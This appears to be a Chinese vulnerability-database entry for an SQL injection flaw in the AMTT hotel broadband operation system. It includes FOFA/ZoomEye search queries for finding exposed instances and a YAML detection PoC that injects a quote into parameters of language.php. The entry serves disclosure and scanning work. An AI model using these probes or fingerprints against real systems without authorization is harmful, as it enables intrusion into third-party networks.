amtt-hiboss-language-sqli: 安美数字酒店宽带运营系统SQL注入漏洞

日期: 2025-09-01 | 影响软件: 安美数字酒店宽带运营系统 | POC: 已公开

漏洞描述

FOFA: title=酒店宽带运营系统 ZoomEye: app:"安美数字酒店宽带运营系统"

PoC代码[已公开]

id: amtt-hiboss-language-sqli

info:
  name: 安美数字酒店宽带运营系统SQL注入漏洞
  author: qiwentaidi
  severity: high
  verified: true
  description: |-
    FOFA: title=酒店宽带运营系统
    ZoomEye: app:"安美数字酒店宽带运营系统"
  tags: amtt,hiboss,sqli
  created: 2023/10/25

rules:
  r0:
    request:
      method: GET
      path: /language.php?Lately=&EditStatus=&Type=&Flag=edit&id='&Search=
    expression: response.status == 200 && response.body.bcontains(b'SQL syntax')
  r1:
    request:
      method: GET
      path: /language.php?Lately=&EditStatus=&Type='&Flag=edit&id=&Search=
    expression: response.status == 200 && response.body.bcontains(b'SQL syntax') 
expression: r0() || r1()

相关漏洞推荐